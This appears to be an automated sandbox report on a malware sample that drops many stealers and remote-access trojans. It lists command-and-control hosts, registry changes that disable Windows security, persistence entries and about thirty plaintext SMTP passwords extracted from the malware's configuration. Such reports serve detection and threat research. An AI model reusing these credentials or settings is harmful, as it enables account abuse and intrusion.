hijackloader | b434527e3f55425dc624118395ee28b4725e81464863dfd15d175dd74fbd9a6a

Resubmissions

02-09-2024 02:19

240902-crxs1syfmm 10

07-07-2024 21:02

240707-zvllgsyaqp 10

01-07-2024 21:37

240701-1gjemsverk 10

Analysis

max time kernel
69s
max time network
855s
platform
windows11-21h2_x64
resource
win11-20240611-en
resource tags

arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system
submitted
01-07-2024 21:37

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

New Text Document mod.exe
Size

8KB
MD5

69994ff2f00eeca9335ccd502198e05b
SHA1

b13a15a5bea65b711b835ce8eccd2a699a99cead
SHA256

2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
SHA512

ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
SSDEEP

96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Credentials

Protocol: smtp
Host:
smtp.progestionchile.com
Port:
587
Username:
[email protected]
Password:
Ebarrera2018

Extracted

Credentials

Protocol: smtp
Host:
smtp.ab.em-net.ne.jp
Port:
587
Username:
[email protected]
Password:
hanawa32

Extracted

Credentials

Protocol: smtp
Host:
smtp.mgmyasoc.com
Port:
587
Username:
[email protected]
Password:
q4tKnbszz

Extracted

Credentials

Protocol: smtp
Host:
smtp.mediacat.ne.jp
Port:
587
Username:
[email protected]
Password:
1466232

Extracted

Credentials

Protocol: smtp
Host:
smtp.elettro-service.com
Port:
587
Username:
[email protected]
Password:
*Lara1970*

Extracted

Credentials

Protocol: smtp
Host:
smtp.an.em-net.ne.jp
Port:
587
Username:
[email protected]
Password:
lovefuku1229

Extracted

Credentials

Protocol: smtp
Host:
smtp.frontier.com
Port:
587
Username:
[email protected]
Password:
3stooges

Extracted

Credentials

Protocol: smtp
Host:
smtp.jcom.home.ne.jp
Port:
587
Username:
[email protected]
Password:
yuuji513

Extracted

Credentials

Protocol: smtp
Host:
smtp.ah.em-net.ne.jp
Port:
587
Username:
[email protected]
Password:
kaduna715

Extracted

Credentials

Protocol: smtp
Host:
smtp.nifty.ne.jp
Port:
587
Username:
[email protected]
Password:
an0908an

Extracted

Credentials

Protocol: smtp
Host:
smtp.frontier.com
Port:
587
Username:
[email protected]
Password:
!Rnmawh9511054

Extracted

Credentials

Protocol: smtp
Host:
smtp.pp.em-net.ne.jp
Port:
587
Username:
[email protected]
Password:
mamu6511

Extracted

Credentials

Protocol: smtp
Host:
smtp.pp.em-net.ne.jp
Port:
587
Username:
[email protected]
Password:
miki1114

Extracted

Credentials

Protocol: smtp
Host:
smtp.jcom.zaq.ne.jp
Port:
587
Username:
[email protected]
Password:
hijiri21

Extracted

Credentials

Protocol: smtp
Host:
smtp.despachantemixirica.com.br
Port:
587
Username:
[email protected]
Password:
Rob251478

Extracted

Credentials

Protocol: smtp
Host:
smtp.frontier.com
Port:
587
Username:
[email protected]
Password:
Alphabeta1@

Extracted

Credentials

Protocol: smtp
Host:
smtp.iau-srl.it
Port:
587
Username:
[email protected]
Password:
elenaloi1

Extracted

Credentials

Protocol: smtp
Host:
smtp.ss.em-net.ne.jp
Port:
587
Username:
[email protected]
Password:
syunyou1217

Extracted

Credentials

Protocol: smtp
Host:
smtp.xx.em-net.ne.jp
Port:
587
Username:
[email protected]
Password:
bau80851

Extracted

Credentials

Protocol: smtp
Host:
smtp.netzero.com
Port:
587
Username:
[email protected]
Password:
Colepat01

Extracted

Credentials

Protocol: smtp
Host:
smtp.gg.em-net.ne.jp
Port:
587
Username:
[email protected]
Password:
mickmick

Extracted

Credentials

Protocol: smtp
Host:
smtp.frontier.com
Port:
587
Username:
[email protected]
Password:
Maestro222

Extracted

Credentials

Protocol: smtp
Host:
ebox.gr
Port:
587
Username:
[email protected]
Password:
symbiosis

Extracted

Credentials

Protocol: smtp
Host:
smtp.gg.em-net.ne.jp
Port:
587
Username:
[email protected]
Password:
adv29891

Extracted

Credentials

Protocol: smtp
Host:
smtp.frontier.com
Port:
587
Username:
[email protected]
Password:
tazan1

Extracted

Credentials

Protocol: smtp
Host:
smtp.progestionchile.com
Port:
587
Username:
[email protected]
Password:
Rrhh2020

Extracted

Credentials

Protocol: smtp
Host:
smtp.kk.em-net.ne.jp
Port:
587
Username:
[email protected]
Password:
ym2r1007

Extracted

Credentials

Protocol: smtp
Host:
smtp.frontier.com
Port:
587
Username:
[email protected]
Password:
chelle92@

Extracted

Credentials

Protocol: smtp
Host:
smtp.mediacat.ne.jp
Port:
587
Username:
[email protected]
Password:
shimifami

Extracted

Family

remcos

Botnet

2556

bossnacarpet.com:2556

vegetachcnc.com:2556

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
chrome-6W1HCC
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

lokibot

http://dashboardproducts.info/bally/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Extracted

Family

vidar

https://t.me/g067n

https://steamcommunity.com/profiles/76561199707802586

Attributes

user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:129.0) Gecko/20100101 Firefox/129.0

Extracted

Family

redline

Botnet

LiveTraffoc

4.185.56.82:42687

Extracted

Family

xworm

Version

5.0

64.23.249.117:6098

Mutex

qBm7HSWbfhJrOf6O

Attributes

Install_directory
%AppData%
install_file
XClient.exe

aes.plain

Signatures

Detect Neshta payload 64 IoCs

Processes:

resource	yara_rule
behavioral2/files/0x000600000002aa49-57.dat	family_neshta
behavioral2/memory/3148-62-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/files/0x000300000002aa4c-69.dat	family_neshta
behavioral2/memory/4504-73-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/files/0x000200000002aa4f-82.dat	family_neshta
behavioral2/memory/4312-85-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/files/0x000300000002aa4e-87.dat	family_neshta
behavioral2/memory/1764-89-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/1764-100-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/4312-110-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/560-114-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/files/0x0007000000027898-131.dat	family_neshta
behavioral2/files/0x000200000002792f-146.dat	family_neshta
behavioral2/files/0x00050000000279d0-147.dat	family_neshta
behavioral2/files/0x00050000000279be-145.dat	family_neshta
behavioral2/files/0x000200000002791c-144.dat	family_neshta
behavioral2/files/0x00020000000278a7-143.dat	family_neshta
behavioral2/files/0x0002000000028bba-170.dat	family_neshta
behavioral2/files/0x0002000000028b6b-180.dat	family_neshta
behavioral2/files/0x0002000000028b6c-181.dat	family_neshta
behavioral2/files/0x0007000000028b66-179.dat	family_neshta
behavioral2/files/0x000100000002a5b0-184.dat	family_neshta
behavioral2/files/0x0001000000010361-212.dat	family_neshta
behavioral2/files/0x0001000000010625-218.dat	family_neshta
behavioral2/files/0x000100000001036a-217.dat	family_neshta
behavioral2/files/0x000100000001034b-215.dat	family_neshta
behavioral2/files/0x0001000000010487-220.dat	family_neshta
behavioral2/files/0x00010000000105b6-229.dat	family_neshta
behavioral2/files/0x000100000001041f-231.dat	family_neshta
behavioral2/files/0x0001000000010427-238.dat	family_neshta
behavioral2/files/0x0001000000010424-237.dat	family_neshta
behavioral2/files/0x00010000000104d3-226.dat	family_neshta
behavioral2/files/0x0001000000010481-225.dat	family_neshta
behavioral2/files/0x000100000001047c-224.dat	family_neshta
behavioral2/files/0x0001000000010488-223.dat	family_neshta
behavioral2/files/0x0002000000028c54-252.dat	family_neshta
behavioral2/files/0x0002000000000681-251.dat	family_neshta
behavioral2/files/0x0001000000010269-214.dat	family_neshta
behavioral2/files/0x000f000000025e3d-261.dat	family_neshta
behavioral2/files/0x000100000002aa53-287.dat	family_neshta
behavioral2/files/0x000a0000000265b7-297.dat	family_neshta
behavioral2/files/0x00030000000260f7-299.dat	family_neshta
behavioral2/files/0x000b000000025ebf-300.dat	family_neshta
behavioral2/files/0x00050000000260ef-296.dat	family_neshta
behavioral2/files/0x0009000000026b38-294.dat	family_neshta
behavioral2/files/0x0003000000025fde-291.dat	family_neshta
behavioral2/files/0x0005000000025e26-290.dat	family_neshta
behavioral2/memory/3148-315-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/4504-316-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/3148-325-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/4504-326-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/3148-335-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/4504-336-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/3148-367-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/4504-368-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/4504-403-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/3148-401-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/3860-405-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/2704-413-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/2716-419-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/3420-438-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/908-446-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/4624-450-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta
behavioral2/memory/2716-452-0x0000000000400000-0x000000000042B000-memory.dmp	family_neshta

Detect Vidar Stealer 10 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/2888-431-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7
behavioral2/memory/2888-428-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7
behavioral2/memory/2888-429-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7
behavioral2/memory/2888-563-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7
behavioral2/memory/2888-571-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7
behavioral2/memory/2888-590-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7
behavioral2/memory/2888-592-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7
behavioral2/memory/2888-600-0x0000000000400000-0x0000000000648000-memory.dmp	family_vidar_v7
behavioral2/files/0x000100000002ab81-7875.dat	family_vidar_v7
behavioral2/files/0x000300000002ac0c-18674.dat	family_vidar_v7

Detect Xworm Payload 8 IoCs

Processes:

resource	yara_rule
behavioral2/files/0x000200000002aa73-535.dat	family_xworm
behavioral2/memory/4116-545-0x0000000000F80000-0x0000000000F90000-memory.dmp	family_xworm
behavioral2/files/0x000100000002aa8e-957.dat	family_xworm
behavioral2/files/0x000100000002aa98-1066.dat	family_xworm
behavioral2/files/0x000100000002aa9a-1138.dat	family_xworm
behavioral2/files/0x000100000002aaa0-1171.dat	family_xworm
behavioral2/files/0x000400000002aaa1-1189.dat	family_xworm
behavioral2/files/0x000100000002ab70-4448.dat	family_xworm

Detects HijackLoader (aka IDAT Loader) 2 IoCs

Processes:

resource	yara_rule
behavioral2/files/0x000500000002ab73-7809.dat	family_hijackloader
behavioral2/files/0x000200000002ab78-7838.dat	family_hijackloader

HijackLoader
HijackLoader is a multistage loader first seen in 2023.
loader hijackloader
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
mimikatz

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

Processes:

asec.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	asec.exe

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2932-529-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
behavioral2/files/0x000200000002ab33-2962.dat	family_redline
behavioral2/files/0x000200000002ab2d-3562.dat	family_redline

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

Windows security bypass 2 TTPs 6 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

asec.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	asec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	asec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	asec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	asec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	asec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	asec.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

explorti.exeexplorti.exeamadka.exeexplorti.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	amadka.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	explorti.exe

mimikatz is an open source tool to dump credentials on Windows 1 IoCs

Processes:

resource	yara_rule
behavioral2/files/0x000400000002aacb-1916.dat	mimikatz

Blocklisted process makes network request 8 IoCs

Processes:

RegAsm.exeRegAsm.exe

flow	pid	Process
22	4912	RegAsm.exe
23	4912	RegAsm.exe
24	4912	RegAsm.exe
27	4912	RegAsm.exe
31	4912	RegAsm.exe
61	2888	RegAsm.exe
63	2888	RegAsm.exe
65	2888	RegAsm.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 48 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
3176	powershell.exe
5364	powershell.exe
6504	powershell.exe
6336	powershell.exe
4580	powershell.exe
4156	powershell.exe
5796	powershell.exe
5388	powershell.exe
6708	powershell.exe
6428	powershell.exe
4876	powershell.exe
3236	powershell.exe
5328	powershell.exe
236	powershell.exe
8492	powershell.exe
6072	powershell.exe
1224	powershell.exe
6388	powershell.exe
6780	powershell.exe
5612	powershell.exe
4712	powershell.exe
5832	powershell.exe
6976	powershell.exe
6352	powershell.exe
6356	powershell.exe
1392	powershell.exe
6216	powershell.exe
7240	powershell.exe
8216	powershell.exe
6596	powershell.exe
8480	powershell.exe
2636	powershell.exe
2928	powershell.exe
4588	powershell.exe
2932	powershell.exe
5904	powershell.exe
6000	powershell.exe
7980	powershell.exe
8344	powershell.exe
1008	powershell.exe
2236	powershell.exe
2748	powershell.exe
5480	powershell.exe
7700	powershell.exe
1672	powershell.exe
7964	powershell.exe
8332	powershell.exe
2360	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exenetsh.exenetsh.exenetsh.exe

pid	Process
6592	netsh.exe
2148	netsh.exe
6348	netsh.exe
4348	netsh.exe

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exe

pid	Process
2864	attrib.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral2/files/0x000100000002ab88-7924.dat	net_reactor

ASPack v2.12-2.42 1 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

Processes:

resource	yara_rule
behavioral2/files/0x000100000002aa54-121.dat	aspack_v212_v242

Checks BIOS information in registry 2 TTPs 8 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

explorti.exeexplorti.exeexplorti.exeamadka.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	explorti.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	amadka.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	amadka.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorti.exe

Drops startup file 4 IoCs

Processes:

justrat.exe1.exeGOOGLE~1.EXE

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windowssandbox.lnk	justrat.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	1.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	1.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google Chrome sandbox.exe.lnk	GOOGLE~1.EXE

Executes dropped EXE 64 IoCs

Processes:

igccu.exesnukingorig2.5.execsrss.exekdmapper.exelog1.exelog2.exesvchost.comsvchost.comlog2.exemNXfxi.exeigccu.exesvchost.comFINAL%~1.EXEsvchost.comANTIMA~1.EXEsvchost.comjustrat.exesvchost.comVIDAR2~1.EXEsvchost.commeta2806.exesvchost.comLUMMA2~1.EXEsvchost.comrise2806.exesvchost.comGOOGLE~1.EXEsvchost.comasec.exesvchost.comcrypt6.exesvchost.com1.exesvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comsvchost.comAnyDesk.exesvchost.comgo.exesvchost.comamadka.exeAnyDesk.exeAnyDesk.exesvchost.comUPDATE~1.EXEmsedge.exemsedge.exesvchost.comsvchost.commsedge.exeexplorti.exesvchost.comXClient2.exemsedge.exesvchost.comsvchost.comXClient.exemsedge.exesvchost.com

pid	Process
4952	igccu.exe
2936	snukingorig2.5.exe
1728	csrss.exe
3148	kdmapper.exe
4504	log1.exe
4312	log2.exe
1764	svchost.com
560	svchost.com
3120	log2.exe
3144	mNXfxi.exe
1736	igccu.exe
4624	svchost.com
4756	FINAL%~1.EXE
2704	svchost.com
4140	ANTIMA~1.EXE
3860	svchost.com
4136	justrat.exe
2716	svchost.com
5064	VIDAR2~1.EXE
3420	svchost.com
4660	meta2806.exe
908	svchost.com
924	LUMMA2~1.EXE
5032	svchost.com
1744	rise2806.exe
2608	svchost.com
3320	GOOGLE~1.EXE
2356	svchost.com
3936	asec.exe
3452	svchost.com
3836	crypt6.exe
3404	svchost.com
4116	1.exe
1988	svchost.com
1356	svchost.com
5008	svchost.com
2516	svchost.com
4324	svchost.com
3308	svchost.com
4088	svchost.com
3084	svchost.com
696	AnyDesk.exe
4948	svchost.com
1576	go.exe
4364	svchost.com
1124	amadka.exe
4464	AnyDesk.exe
1724	AnyDesk.exe
3440	svchost.com
2072	UPDATE~1.EXE
1572	msedge.exe
5564	msedge.exe
5620	svchost.com
5628	svchost.com
5684	msedge.exe
5716	explorti.exe
6036	svchost.com
5344	XClient2.exe
5392	msedge.exe
5488	svchost.com
5536	svchost.com
5580	XClient.exe
5768	msedge.exe
5688	svchost.com

Identifies Wine through registry keys 2 TTPs 4 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

amadka.exeexplorti.exeexplorti.exeexplorti.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Wine	amadka.exe
Key opened	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Wine	explorti.exe
Key opened	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Wine	explorti.exe

Loads dropped DLL 2 IoCs

Processes:

AnyDesk.exeAnyDesk.exe

pid	Process
1724	AnyDesk.exe
4464	AnyDesk.exe

Modifies system executable filetype association 2 TTPs 1 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

Processes:

kdmapper.exe

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	kdmapper.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description	ioc
Destination IP	141.98.234.31

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

asec.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1"	asec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1"	asec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1"	asec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1"	asec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1"	asec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1"	asec.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1"	asec.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

igccu.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	igccu.exe
Key opened	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	igccu.exe
Key opened	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	igccu.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

1.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1560405787-796225086-678739705-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe"	1.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 22 IoCs

Web Service

T1102

Processes:

flow	ioc
1239	pastebin.com
1399	pastebin.com
1642	pastebin.com
1660	pastebin.com
176	pastebin.com
454	pastebin.com
599	pastebin.com
840	pastebin.com
338	pastebin.com
395	pastebin.com
440	pastebin.com
529	pastebin.com
587	pastebin.com
25	pastebin.com
258	pastebin.com
287	pastebin.com
366	pastebin.com
501	pastebin.com
332	pastebin.com
338	raw.githubusercontent.com
346	pastebin.com
398	raw.githubusercontent.com

Looks up external IP address via web service 11 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
1	api.ipify.org
9	ip-api.com
25	ipinfo.io
312	ipinfo.io
481	ipinfo.io
312	icanhazip.com
25	icanhazip.com
73	ipinfo.io
97	api.ipify.org
149	api.ipify.org
174	ip-api.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Power Settings 1 TTPs 14 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

Processes:

svchost.compowercfg.exepowercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exe

pid	Process
6016	svchost.com
6580	powercfg.exe
8928	powercfg.exe
180	cmd.exe
8476	powercfg.exe
7252	powercfg.exe
5328	powercfg.exe
7900	powercfg.exe
7304	cmd.exe
8096	powercfg.exe
6044	powercfg.exe
5632	powercfg.exe
8048	powercfg.exe
8816	powercfg.exe

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral2/files/0x000300000002aa3f-25.dat	autoit_exe
behavioral2/files/0x000400000002aa85-792.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs

Processes:

amadka.exeexplorti.exeexplorti.exeexplorti.exe

pid	Process
1124	amadka.exe
5716	explorti.exe
784	explorti.exe
5304	explorti.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

csrss.exeigccu.exeVIDAR2~1.EXELUMMA2~1.EXErise2806.execrypt6.exeKJDHCA~1.EXE

description	pid	Process	procid_target
PID 1728 set thread context of 5104	1728	csrss.exe	96
PID 4952 set thread context of 1736	4952	igccu.exe	101
PID 5064 set thread context of 2888	5064	VIDAR2~1.EXE	319
PID 924 set thread context of 4912	924	LUMMA2~1.EXE	244
PID 1744 set thread context of 2776	1744	rise2806.exe	129
PID 3836 set thread context of 2932	3836	crypt6.exe	140
PID 5196 set thread context of 5340	5196	KJDHCA~1.EXE	213

Drops file in Program Files directory 64 IoCs

Processes:

mNXfxi.exelog1.exekdmapper.exesvchost.com

description	ioc	Process
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\javapackager.exe	mNXfxi.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\xjc.exe	mNXfxi.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE	log1.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\bin\appletviewer.exe	mNXfxi.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe	log1.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\Application\90.0.818.66\pwahelper.exe	kdmapper.exe
